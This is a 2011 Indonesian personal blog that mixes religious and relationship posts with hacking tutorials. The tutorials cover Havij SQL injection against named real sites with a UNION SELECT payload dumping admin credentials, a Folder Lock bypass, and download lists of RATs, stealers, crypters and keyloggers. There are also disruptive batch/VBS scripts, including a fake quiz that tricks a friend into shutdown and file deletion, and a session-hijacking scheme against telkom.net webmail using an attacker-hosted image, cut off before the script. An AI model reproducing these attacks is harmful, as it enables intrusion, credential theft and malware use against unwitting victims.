Semoga anda senang dengan sajian kami SALAM BETA CYB3R
selamat datang di rafi blog

Senin, 28 Februari 2011

Obat Ujub

Berkata Al-Imam Asy-Syafi’i Rahimahullah tentang obat ujub :
“Apabila kamu mengkhawatirkan ujub terhadap amalanmu, maka perhatikanlah; ridho siapa yang kamu cari?, pahala siapa yang kamu harapkan?, hukuman siapa yang kamu takutkan?, kesehatan dan nikmat mana yang kamu syukuri?, dan bencana apa yang kamu ingat?. Sesungguhnya apabila kamu berfikir tentang salah satu dari beberapa perkara ini, pasti menjadi kecil di matamu amalanmu.”
(Ma’alim Fit Tarbiyah Wad Dakwah, Mawa’idh Al-Imam Asy-Syafi’i, Penyusun Sholih Ahmad Asy-Syami, hlm 9, Maktabah Syamilah)Penjelasan:
Ujub adalah sifat yang tercela dan dibenci Allah, yaitu seseorang yang bangga terhadap dirinya dan amalnya.
Al-Imam Asy-Syafi’i Rahimahullah memberikan lima resep untuk mengobati sifat ujub tersebut:
1. Dalam beramal tentu seseorang mencari ridho Allah, dan dia tidak akan mendapatkan ridho Allah apabila ujub terhadap amalnya.
2. Dalam beramal tentu seseorang mengharapkan pahala Allah, dan dia tidak akan mendapatkan pahala Allah apabila ujub terhadap amalnya.
3. Dalam beramal tentu seseorang mengharapkan selamat dari hukuman Allah, dan dia tidak akan selamat dari hukuman Allah apabila ujub terhadap amalnya.
4. Semua amal kita apabila dibandingkan dengan nikmat yang diberikan Allah kepada kita tentu masih lebih banyak nikmat Allah yang kita terima yang harus kita syukuri, padahal kita tidak akan mampu mensyukuri nikmat-nikmat tersebut dengan sebenarnya. Lalu apa yang kita banggakan dari amal kita ?.
5. Berapa banyak bencana yang kita diselamatkan Allah darinya, padahal amal kita tidak seberapa dibanding bencana-bencana yang kita diselamatkan darinya. Lalu apa yang kita banggakan dari amal kita ?
Kalau kita renungkan salah satu dari lima resep tersebut pasti akan hilang dari kita sifat ujub yang tercela itu…
Semoga kita bisa mengambil hikmah dari catatan ini
Silahkan SHARE ke rekan anda jika menurut anda note ini bermanfaat
Sumber : Hatibening.com
Shared By Catatan Catatan Islami Pages

Minggu, 20 Februari 2011

crack folder lock


Tadi gw dapet panggilan masuk dari seorang sahabat, setelah basa-basi dia nanya kabar ini dan itu ternyata intinya cuma satu, dia minta tolong cariin software pembobol Folder Lock buat buka data skripsinya yg udah dia Lock pake folder lock, soalnya dia lupa passwordnya. gw jadi teringat tutorial jebol folder Lock yg pernah gw simpan di notebook gw. Sekalian Iseng2 berbagi ama temen2 di binushacker yg belum tau teknik ini, jadi mohon maaf klo postingan ini terlihat basi… wkwkwkw….(yg udah tau gak usah baca…)
To the POint:
1. Buka folder yg udah di proteksi ama Folder Lock dan coba masukin sembarang password
2. Biarin Folder Lock menunggu, buka regedit “hkey_local _machinesoftwarefolder lock, “bar code”
3. Ganti nama “bar code” menjadi “bar codet”
4. Sekarang kembali ke Folder Lock dan masukin password terserah apa aja
5. Lalu Klik “ok” dan mudah mudahan Folder Lock sudah bisa di Akses.

Semoga Bermanfaat, setidaknya sebagai bahan pengingat ilmu2 kita yg udah hilang….
Bravo Indonesian.

Jumat, 18 Februari 2011

Belajar Hacking





Nah, sekarang telah muncul program baru buat belajar hacking (bagi yang mau belajar). Caranya gampang kok tinggal donlot filenya, dengan cara mengklik link di bawah.



Disini anda akan bermain dengan hacking. Program ini adalah game yang berisi tentang hacking. Silahkan langsung download aja.

Passwordnya "fadlu"

http://www.ziddu.com/download/12347071/Hacking.rar.html

Cara hack website menggunakan Havij 1,10 (Full tutorial)

Silahkan Deface Website Pake Havij :
Download havij 1.10 Disini

Tutorial Pertama Bisa Download Disini
Tutorial Kedua Bisa Juga Download Disini

Pertama Cari situs terinfeksi sqli. Sekarang di sini saya menemukan sebuah situs vulernable
http://www.hypetrading.com/productinfo.php?id=285

Sekarang Mari kita mulai

Buka havij dan copy dan paste link yang terinfeksi seperti yang ditunjukkan pada gambar

Sekarang klik pada "Analisis"


Kemudian Ini menunjukkan beberapa pesan di sana .... Jadilah waspada pada itu dan akan menunjukkan kesabaran untuk kadang-kadang untuk menemukan itu vulernable dan jenis injeksi dan jika server mysql db adalah dan akan menemukan name.Then database setelah mendapatkan itu database nama seperti xxxx_xxxx


Lalu Pindah ke operasi lain untuk menemukan tabel dengan mengklik "tabel" sebagai tokoh klik shown.Now "Dapatkan tabel" Kemudian tunggu beberapa waktu jika diperlukan


Setelah mendirikan tabel, Anda dapat melihat akan ada "pengguna" Pasang tanda di atasnya dan klik di "kolom mendapatkan" tab seperti pada gambar


Dalam menandai Hanya menempatkan nama pengguna dan password dan klik "Dapatkan data"


Bingo Got sekarang id dan pass yang mungkin admin ...
lulus akan mendapatkan sebagai md5 Anda dapat memecahkannya juga menggunakan alat ini seperti yang ditunjukkan pada gambar ...


 

Selasa, 15 Februari 2011

Download Hackers Kit Tools Rats


ALL CREDIT TO CREATORS, all my thanks too.

My Personnal Compilation

Batch
- DELmE's Batch Virus Generator v 2.0
- Power Of Batch [Text File]

Binders
- Bl0b B!nder 0.2.0 + USG
- BlackHole Binder
- F.B.I. Binder
- Predator 1.6
- PureBiND3R by d3will
- Schniedelwutz Binder 1.0
- Simple Binder by Stonedinfect
- sp1r1tus Binder 1.0
- Tool-Store Binder 1.0
- Tool-Store Toasty Binder 1.0
- Yet Another Binder 2.0
- Others

Crypters
- Bifrost Crypter by ArexX 2
- Cryptable Seduction 1.0 by DizzY
- Crypter by Permabatt
- Crypter bY YoDa
- Cryptic 1.5
- Daemon Crypt 2 Public
- Deception 4 by [RaGe] [Favorite :D]
- Destructor Crypter
- EXECrypt 1 M0d by CARDX
- Fuzz Buzz 1.2 by BulletProof
- OSC-Crypter by haZl0oh M0d
- Poison Ivy Crypt M0d by CARDX
- SaW V1 Mod by LEGIONPR
- Skorpien007 Crypter 3.1
- Stonedinfect Crypter 1.0
- Trojka Crypter 1.1 by tr1p0d

Keyloggers
- Ardamax 2.8
- Ardamax 2.41

Nukers And Fl00ders
- Ass4ult
- B4ttl3 P0ng
- Click v2.2
- Fortune
- ICMP Fl00d
- Panther Mode 1 & 2
- Rocket v1.0
- RPC Nuke

Port & IP Scanners
- Advanced IP Scanner
- Advanced Port Scanner
- Bitching Threads
- BluePortScan
- LanSpy
- NeoTracePro
- NetScanTools
- ProPort
- Putty v0.6
- SuperScan
- Trojan Hunter 15
- ZenMap - Nmap v5.21 [Win]

R.A.T.s
- Apocalypse 1.4.4
- Aryan v0.5
- Bandook RAT 1.35
- Bifrost 1.2.1d
- Cerberus 1.03.4
- All Cybergates from v1.01.8 to v1.04.8
- DarkComet 2 RC3
- Lost Door 4.0 Pro
- MeTuS-Delphi-2.8
- Nuclear RAT 2.1.0
- Optix v1.33
- Poison Ivy 2.3.2
- ProRat 1.9 SE
- SharK 3
- Spy-Net v2.6
- SubSeven 2.3
- Turkojan 4 Gold

Sniffers
- Cain & Abel Self Installer [WinXP]
- WireShark Self-Installer [Win32]

Stealers
- 1337 SteamACC Stealer Private
- Allround Stealer
- Armageddon Stealer 1.0 by Krusty
- bl0b Recovery 1.0
- Blade Stealer 1.0 PUBLIC
- Codesoft PW Stealer 0.35
- Codesoft PW Stealer 0.50
- Dark Screen Stealer 2
- Dimension Stealer 2 by Gumball
- FileZilla Stealer 1.0 PUBLIC
- FileZilla Stealer by Stonedinfect
- Firefox Password Stealer - Steamcafe
- Fly Stealer 0.1
- Fudsonly Stealer 0.1
- Hackbase Steam Phisher 1.2 BETA
- spam 0.0.1.4
- spam Stealer
- HardCore Soft 0.0.0.1
- ICQ Steal0r
- IStealer 4.0
- IStealer 6.0 Legends
- LabStealer by Xash
- Multi Password Stealer 1.6
- Papst Steale.NET
- Pass Stealer 3.0
- Pesca Stealer 0.2
- pixel Stealer 1.3.0 SC
- pixel Stealer 1.4.0
- ProStealer
- Public Firefox 3 Stealer
- Pure-Steam 1.0 CS
- Pw Stealer by Killer110
- PWStealer 2.0
- Remote Penetration 2.2
- SC LiteStealer 1
- SimpleStealer 2.1
- SPS Stealer
- SStealer by till7
- Steam Stealer 1.0 by ghstoy
- Steam Stealer by till7
- Stupid Stealer 6 mit PHP Logger
- System Stealer 2
- The Simpsons Stealer 0.2
- Tool-Store FileZilla Stealer 1.0
- Ultimate Stealer 1.0
- Universal1337 - The Account Stealer
- Universal1337 2
- Universal1337 3

Vulnerability Scanner and Exploiter
- Atk ToolKit 4.1 [Src Code Included]
- Metasploit Framework V3.4.0 [Win]
- Nessus [Win32]

Website Exploit And SLQ Injections
- Admin Finder
- CGI-Bug Scanner
- Exploit Scanner
- ServerAttack
- SQL Helper
- Dork List [Text File]
- Dork [Text File]
- Master Google Hack List [Text File]

Others
- Bruteforcers
- Extra! [From VIP Vince Tool pack]
- ProxyBrowser
- Various Tools
- Much more





SQL Injection with Havij



Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.

The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.


The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

Link For Download

Remote Administration Tools (RAT)


APa itu RAT?
Oks RAT kependekan dari Remote Administrator TOol
Rat di gunakan untuk menghubungkan dan mengatur satu atau lebih komputer dengan berbagai kemampuan seperti:

# Screen/camera capture atau control
# File management (download/upload/execute/dll.)
# Shell control (CMD control)
# Computer control (power off/on/log off)
# Registry management (query/add/delete/modify)
# spesifikasi dari Produk RAT lain masing2.

Direct Connection
RAT type direct-connection adalah RAT dengan set up yang simple dimana Client(orang yang menyebarkan)mengkoneksikan dirinya ke satu atau lebih Server(komputer korban)secara langsung.

Reverse Connection
RAT yang menggunakan dan mengutilisasi Reverse Connection memiliki Beberapa Kelebihan

#Keluar masuk nya koneksi umumnya tidak terlacak. dan tidak terdeteksi atau di Block oleh Firewall,seperti Router.
#karena Remote komputer mengkoneksikan ke Remote administrator,Si pelaku tidak perlu mengetahui IP korban untuk melakukan hubungan.jadi dalam satu RAT pasti akan ada Client dan Server.2 Tools dalam satu software.
#mass-distribution,artinya kita bisa menyebarkan Server nya ke pada siapapun ,dan kita bisa mengontrol komputer – komputer yang sudah terinstal kan Server kita (remote komputer)lebih dari satu pada saat bersamaan.
#Jika Mass-distribution dilakukan,lebih mudah untuk Tracking komputer yang sudah di sadap dan terinstallkan RAT tersbut.karena ada fasilitas “calling home” oleh koneksi ke REmote administrator (komputer kita)
Most Pupolar RAT programs With Links, see below:
1. Cerberus RAT
Download:
Resource

2. Nuclear Rat 2.1.0
Download :

3. Prorat RAT
Download:
Rar Password: oksa52wq

Username: mohdjase1 Password: 66618e869accfc4f96
resource:

4. CyberGate RAT
Download:

5. Seed 1.1 Rat
Download:

6. Lost Door V4.2 LIGHT
Download:

7. Apocalypse RAT
Downlaod:

8. SubSeven RAT
Download :

9. Spy-Net RAT
Download:
Password: Spy-Net

Resource :

10.Turkojan Gold RAT
Download :

Resource :

Other Best Rat
11.Poison Ivy Rat
download:
resource:

12.Shark RAT v3.0.0
Download:

13.BiFrost RAT
Download:

Top Tools Hacker Indonesia




Sering para newbie / hacker pemula ingin belajar hacker dengan tools, ini memang sangat wajar dan sangat di jadikan bahan pembelajaran yang cukup efektif bagi pemula, apa lagi para hacker awal awal hanya ingin merusak, entah itu merusak komputer sendiri seperti membuat virus atau deface yang merusak website orang, berbagai tools yang sering di gunakan cukup bannyak untuk saat ini, tapi anda belum tahu jikalau tools yang anda pakai itu dari indonesia dan anda bahkan tidak tahu siapa pembuatnya bukan? berikut tools terfavorit di indonesia dan dari indonesia.




1. Tools Kerinci
Mungkin bagi pemula teknik hacking yang paling dasar adalah sql injection, nah tools ini memang saya akui sangat efektif bagi pembelajaran dasar dan tidak jauh berbeda dari tools havij

2. B374K
Tools backdoor paling banyak di pakai di indonesia bahkan dunia adalah b374k, tidak percaya? ini kita bisa kita buktikan di pencarian google, anda tahu ini tools sama pembuatnya dengan tools kerinci, yakni ke T ek

3. Jumping Finder
Hacker Cisadane memiliki tools yang sangat di akui dunia, xadpritox sang pembuat memang tidak sia sia, pasalnya tools ini sangat bagus dan ini sudah di buktikan di beberapa negara oleh para hacker

4. OsCommersce Scanner
Tools ini memang sangat di gandrumi para carder, pasalnya tools ini sangat efektif untuk mencari dolar / CC / Carding

5. ASP Scanner
Hmei7 adalah pembuat tools oscommerce dan asp scanner ini, tools nya memang sangat di gemari para defacer untuk saat ini, tapi entah jika sebuah system sudah di update, apakah tools ini masih bisa berjalan? atau akan punah.

Ini adalah 5 tools dari indonesia yang saat ini paling sering di gunakan hacker di indonesia, tools ini juga berasal dari indonesia. Semoga anda dapat menggunakan tools ini dengan berguna

6 Tanda – Tanda Cinta Sejati






Tetapi tak semua orang bisa dengan jelas membaca tanda-tanda apakah si dia memang layak dijadikan pasangan seumur hidup. Sebab perbedaan rasa nyaman menjadi teman dan pacar sangatlah tipis. Karena itu, tidak salah untuk memiliki “panduan” dalam membaca tanda-tanda, “Diakah, cinta sejati kita?”

1. Tanda 1: Kita memiliki list lengkap apa-apa saja yang perlu dia hentikan jika status keterikatan hubungan semakin ditingkatkan. Mulai dari cara bicaranya, penampilannya, sampai apa yang menjadi kegemarannya. Karena jika kita bersikeras untuk memperbaiki “cela” ini maka kita akan mengubahnya menjadi orang lain. Lebih baik jujur pada diri sendiri dan keadaan, bahwa dia memang bukan untuk kita, daripada terlalu memaksakan diri dan membuang waktu percuma.

2. Tanda 2: Kita tidak mempercayainya. Sedikit cemburu, bisa menjadi bumbu asmara. Tetapi jika kita “membuntuti” dia sampai harus membaca e-mail dan SMS-nya untuk mengetahui apa yang dilakukan selama satu hari penuh, ini adalah indikasi awal dari ketidakcocokan. Sebenarnya indikasi ini sangat kasat mata tapi kita sering berlindung dengan mengatakan apa yang kita lakukan dilakukan banyak perempuan di luar sana.

3. Tanda 3: Sangat berusaha sekeras tenaga untuk menghindari konflik. Sama seperti rasa cemburu, kadang kala kita perlu sesekali berbeda pendapat. Sebab yang terpenting dari perselisihan adalah kemampuan kita dan pasangan untuk mencari jalan keluar. Inilah titik toleransi untuk memahami dan menerima karakter masing-masing. Menghindari masalah tidak selalu berarti kita adalah pasangan yang sejiwa, karena bisa jadi itu cara kita untuk lari dari masalah.
4. Tanda 4: Dia bukanlah shoulder to cry on. Saat kita tengah terpuruk atau sedih, kita butuh seseorang yang melembutkan suasana. Jika kita tidak menemukan kenyamanan untuk mencurahkan perasaan dan air mata di depan dia, maka kita sebenarnya akan kesulitan menemukan ketenangan bersamanya. Karena Mr Right akan membuat kita tersenyum dan meredam segala ketakutan yang kita punya saat begitu banyak masalah datang menghadang.

5. Tanda 5: Kita tidak bisa menemukan visi yang jelas untuk membesarkan anak bersama. Menjadi orang tua adalah sebuah team work yang harus solid sepanjang masa. Karena itu, jika kita ragu akan bentuk kerja sama yang terjalin dengan partner tersebut maka lebih baik menerima bahwa dia memang bukan untuk kita.

6. Tanda 6: Kita kesulitan untuk bisa saling menghargai. Coba amati, berapa kali kekasih hati kita mengolok-olok kita di depan teman-teman. Rasa cinta justru muncul karena kita dapat saling menghargai. J

Tutorial - Hacking Web Menggunakan Havij


------------------------------
STEP 1 Inject Url Target
------------------------------
Masukan Url target di coloums paling atas lalu klik Analize


Lihat coloums pling bawah untuk mengetahui Vuln target & jumlah coloumnpastekan url di browser dengan jumlah coloumn yang ada di Havij
teknik yang di gunakan disini (SQL injection ) untuk mencari username & password
contoh :
http://www.arenabola.com/?page=artikel&id=9+AND+1=2+union+select+1,2,3,group_concat(user,0x3a,pass),5,6,7,8,9,10,11,12+from+admin--

----------------------------------------------------------------------
STEP 2 Menghash Password apabila masih berbentuk MD5
------------------------------------------------------------------------
Pilih MD5 & masukan password yang akan d hash...lalu klik Start
Password akan di hash secara online oleh havij di 15 Situs Hash password
Hasil
----------------------------------------
STEP 3 Mencari Halaman admin
----------------------------------------
Msukan url target lalu pilih Find Admin

Cara Mudah Hacking Website Dengan Javascript







kali ini Saya akan bahas tentang hacking menghacking.
Saya dapat ilmu dan script ini dari internet. Mungkin sudah banyak yang tau  tentang teknik hackingdan script ini. Bagi Anda yang masih Newbie/Pemula Hackers seperti Saya, tidak perlu bingung bagaimana cara nge-hack website dengan Teknik Hacking ini. Tidak perlu aneh-aneh dan merepotkan segala, cukup copy paste aja script di bawah ini ke address browser Anda:
javascriptdocument.body.contentEditable = ‘true’;document.designMode = ‘on’; void 0
Script diatas tidak akan bekerja karena theme saya tidak mendukung tanda koma seperti yang Saya harapkan. Untuk itu, saya mengupload script itu dalam bentuk text file karena mendukung tanda koma seperti yang Saya harapkan dan Anda bisa download script itu disini
Sedikit info Bagaimana cara hacking dengan javascript diatas:
1. Carilah sebuah website korban Anda, contohnya saja blog ini www.tony-oto.co.cc
2. Copas script diatas ke address browser Anda, disarankan untuk menggunakan browser Mozilla Firefox ya….
3. Tekan Enter
4. Klik sembarang pada halaman blog, trus delete ( Tekan delete pada keyboard ya :) ) semua isi blog itu sampek puas…………………………

Trik Hacking Website yang di BLOCK (Facebook, Friendster dll.)






WARNING!
Artikel ini Bukan untuk disalah gunakan!

(Jika anda menggunakan tutorial ini dengan salah, maka anda tidak bisa menggunakan trik ini... ya iyalaaah....)

Jika anda menggunakan ini untuk hal-hal yang melanggar hukum, saya TIDAK BERTANGGUNG JAWAB!

(Ethical Hacking)



Nah dibawah ini adalah beberapa kegunaan dari TRIK HACK ini:



  • Jika anda membuka youtube, kemudian ada warning: "This Video is Restrickted to this Country."
  • Kalau internet di kantor di pasang filter: Facebook, Friendster atau Blogger (kalau blogger di filter aku bener-bener ga rela, makanya aku bikin tutorial ini) :v
  • Buat iseng dari pada ga ada kerjaan, ingin coba-coba jadi hacker abal (kaya aku... :D )
  • Saya selalu mendukung kebebasan! (MERDEKA!!!)
  • Trick ini bisa digunakan untuk menembus bebrbagai macam jenis filtering (Tapi ingat! saya tidak bertanggung jawab, jika trick ini digunakan untuk hal-hal yang melanggar hukum. Sebaiknya hanya untuk tujuan yang sudah saya sebutkan diatas saja)



Langsung saja, cape nulis yang ga nyambung!
  1. Sekarang anda SIGN UP di http://your-freedom.net (pilih yang free account)
  2. Dowload Your Freedom dan install di PC anda
  3. Download JRE (kalau sudah terinstall tidak perlu)
  4. Buka Your Feedom software. Anda akan melihat tampilan seperti ini:



  • 5. Ckick "Account Profile" Isi User Name & Password, sesuai dengan Account Your-Freedom anda.
  • 6. Click "Ports" anda akan melihat ini: (beri "check mark" seperti yang terlihat di gambar)




  • 7.Click "Status" tab, Click "Configure". (Setelah terlihat tampilan seperti ini, ikuti seperti yang terlihat di gambar)



  • 8.Click "Wizard". Click "Next" kemudian tunggu, hingga terlihat tampilan seperti ini:




  • 9. Pilih salah satu dari server tersebut, kemudian click "NEXT". Kemudian click "Save and Exit".
  • 10. Click "Start Connection"




BAGIAN PERTAMA SUDAH SELESAI!

Sekarang saatnya setting browser anda. Kali ini saya menggunakan browser MOZILLA.
1. Pada menu bar, click: Tools>Option



2. Click: Advanced>Network>Setting

3. Lakukan seperti yang terlihat di bawah ini:




4. SELESAI!!!!!!!!

Nah, Skarang anda bisa Ber- Facebook ria, ber-Friendster ria, ber-Blogger ria, asal jangan tamasya ke binaria :D

KUMPULAN SCRIPT JAHIL UNTUK HACK KOMPUTER TEMAN



 kali ini saya mau posting cara jailin orang dengan script script sederhana
dan ada yang berguna juga tergantung gimana temen2 modif kata2 nya
bisa di kombinasiin sendiri ....misal nya di taruh di startup..

buka notepad lalu copy paste script di bawah.....

1.message yang nongol melulu

Code:

@ECHO off
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

save namafile.BAT
ket:
walaupun di kill task manager,masih tetep nongol message nya

kata2 nya bisa diganti sesuai selera masing2...
2.bikin shutdown+message

Code:


@echo off
msg * apaan sih lo
shutdown -s -c "Error! muka mu standar abis"

save namafile.BAT

3.Mainin Caps Lock button

Code:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
save namafile.vbs

4.buka tutup CD/DVD
Code:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
save namafile.vbs


5.bikin vbscript nongol mlulu
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
save namafile.vbs
ket: di task manager full wscript yg lg running

6.teken tombol backspace mlulu
Code:
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
save namafile.vbs

7.otomatis ngetik "lu jelek banget sih" di notepad/word
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "lu jelek banget sih!!!"
loop
save namafile.vbs

8.buka notepad trus menerus
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
save namafile.BAT
ket : termasuk yang ngeselin banget nih
bisa di ganti,terserah mau buka cmd ato buka yg lain..ganti aja dir nya.

9.otomatis buka notepad lalu ngetik apa yg lo mau
Code:
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "

save namafile.vbs


ket:
ini salah satu script favorit gw...dulu pernah gw nembak cewek pake cara ini..
gw rangkai pake kata2 gw...trus durasi ngetik nya juga di lambatin...
nama file nya isihatiku.vbs..
angka2 di atas bisa di modif sendiri (durasi nongol notepad/ngetiknya)

Tambahan ahh
dari script diatas temen2 kembangin aja lagi...misal kayak gini nih
Code:
@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
nah script diatas save jadi quiz.bat kasih ke temen..
pura2 aj bilang ad aplikasi kuis...
ket di atas :
kalo pilih 1.otomatis matiin computer
2.format file (terserah file apaan ganti aj dir nya)
3.sama aj kayak pilihan 1
kata2 di atas di ganti2 aj sesuai selera temen2

sekian kumpulan script2 yang jail/berguna, Selamat beriseng ria,................jangan lupa klik link di bawah ini dulu http://www.bigextracash.com/aft/d35defa5.html

Sabtu, 12 Februari 2011

Hacking Email Telkom.net dan Plasa.com


Binus 
Hacker Sponsor Banner

Telkom.net dan Plasa.com adalah fasilitas email gratis yang diberikan oleh PT Telkom. Pengguna email telkomnet dan plasacom patut waswas, karena amat mudah untuk menghack email di sana. Hanya dengan membuka sebuah email yang telah dirancang khusus oleh attacker, email anda bisa menjadi milik attacker. Dalam artikel ini saya akan tunjukkan apa kelemahannya, bagaimana cara mengexploitasi kelemahan itu dan tentu saja bagaimana cara agar terhindar dari serangan itu.
Webmail Session Hijacking
Teknik hacking email dalam artikel ini adalah dengan cara hijacking session. Oleh karena itu teknik ini hanya bisa dilakukan pada webmail telkom.net dan plasa.com, pengguna telkom.net dan plasa.com yang menggunakan Outlook/Thunderbird tidak rentan terhadap serangan ini.
Karena http adalah protokol yang stateless, sedangkan untuk membuat session server harus bisa memantau state user, maka digunakanlah session ID sebagai kunci atau penanda suatu session. Bila sessionID diketahui attacker, maka attacker bisa menguasai session korban. Orang lain, siapapun yang membawa sessionID anda, akan dianggap oleh server sebagai anda. Hijacking session adalah usaha untuk mendapatkan session ID korban, dengan cara predicting, capturing, atau fixating session ID.
SessionID diberikan oleh server dan harus dikembalikan lagi oleh browser (client) setiap kali membuat request. Mekanisme penyimpanan dan pengiriman session ID bisa dilakukan dengan dua cara:
  1. Session Cookie: Session ID diberikan server dalam bentuk cookie dan disimpan oleh browser. Setiap browser melakukan request, cookie tersebut akan dikembalikan ke server lagi sebagai bukti bahwa user tersebut adalah masih orang yang sama.
  2. URL Rewriting: Server menyisipkan session ID dalam halaman html yang dikirimkan ke browser. Session ID tersebut dimasukkan dalam bentuk URL di tag html tertentu seperti link (tag A). Contohnya bila URL link aslinya adalah http://www.somesite.com/inbox.php Oleh server link tersebut akan disisipkan sessionID menjadi: Dengan cara ini setiap kali user mengklik link tersebut, maka sessionID juga akan dikirim ke server sebagai bukti bahwa user tersebut adalah pengguna session yang sah.
SessionID paling aman disimpan dan dikirim kembali ke server dalam bentuk cookie, apalagi bila cookie tersebut diamankan dengan bit secure atau httponly. Kemungkinan serangan yang bisa dilancarkan untuk mencuri cookie adalah dengan XSS attack dan sniffing attack, kedua jenis serangan itu bisa dicegah dengan bit secure dan httponly.
Bila cookie telah diamankan dengan secure bit, maka cookie tersebut tidak bisa dicuri dengan sniffing karena cookie hanya dikirim melalui https, cookie tersebut juga tidak bisa dicuri dengan serangan XSS karena akses javascript terhadap cookie telah ditutup. Bila cookie hanya dilindungi dengan httponly, maka cookie itu aman dari serangan XSS, namun rentan sniffing bila cookie dikirimkan melalui http biasa.
Berbeda dengan cookie, menyimpan Session ID dalam URL sangatlah berbahaya, karena URL mudah dilihat, dikopi dan disimpan dalam bookmark, log file dan sebagainya. Selain itu sessionID juga bisa bocor ke tempat lain melalui header Referer. Sebab header Referer bertugas membawa URL dimana sebuah request dilakukan. Bila dalam suatu halaman terjadi request untuk mengambil gambar, maka header Referer akan mengandung URL dari halaman tersebut. Dalam artikel ini saya akan menggunakan jurus header Referer untuk membajak session webmail Telkom.net dan Plasa.com. Bagi pemilik situs, tentu sering melihat header ini dengan program statistic seperti Awstats untuk melihat pengunjung situs berasal dari situs mana saja.

telkom.net URL

SessionID webmail Telkom.net dan Plasa.com disimpan pada URL sehingga memudahkan pembajakan session. Mari kita lihat bagaimana bentuk URL webmail telkom.net dan plasa.com:
Stealing SessionID from Referer Header
Session ID pada URL telkom.net dan plasa.com disisipkan setelah /Session/ hingga karakter / (slash). Sekarang bagaimana caranya attacker bisa mengetahui URL yang sedang dibuka korban di browsernya? Di awal saya sudah menyebutkan sekilas tentang header request yang bernama Referer. Tugas dari header ini adalah mengirimkan URL halaman yang melakukan request. Agar lebih jelasnya mari kita lihat sebuah contoh.
Ketika pengunjung sedang membuka halaman dengan URL:
Kemudian ketika terjadi request ke sebuah file image:
Maka pada request GET tersebut akan ada header seperti di bawah ini:
0
1
2
3
4
5
6
7
8
9
10
11
GET /Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif HTTP/1.1
Host: mail.telkom.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5 ImageShackToolbar/5.0.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/mailbox.wssp?Mailbox=INBOX&
Cache-Control: max-age=0
Pada baris ke-10 terdapat header Referer yang menunjukkan bahwa request tersebut terjadi ketika kepada user sedang berada di URL tersebut. Karena URL yang direquest adalah http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif, maka web server mail.telkom.net tempat file batal.gif tersebut berada, dapat mengetahui URL ketika request tersebut terjadi. Sekarang bayangkan apa yang terjadi bila request tersebut bukan mendownload image dari mail.telkom.net, tapi dari server www.evilhackersite.com/image.jpg. Web server di www.evilhackersite.com tentu akan mendapatkan URL tempat terjadinya request dari header Referer. Dan karena URL tersebut mengandung Session ID, maka dengan mudah attacker akan membajak session anda.
Attack Scenario
Webmail telkom.net dan plasa.com menggunakan URL sebagai mekanisme pertukaran session ID. Attacker bisa menjebak korban untuk membuka sebuah email yang mengandung gambar yang berlokasi di server attacker. Tag IMG tersebut akan membuat browser korban melakukan request ke server attacker, dengan tentu saja mengirimkan URL korban dalam header Referer. Dengan mengetahui session ID korban, attacker dengan mudah menguasai account webmail korban.
Preparing the Script
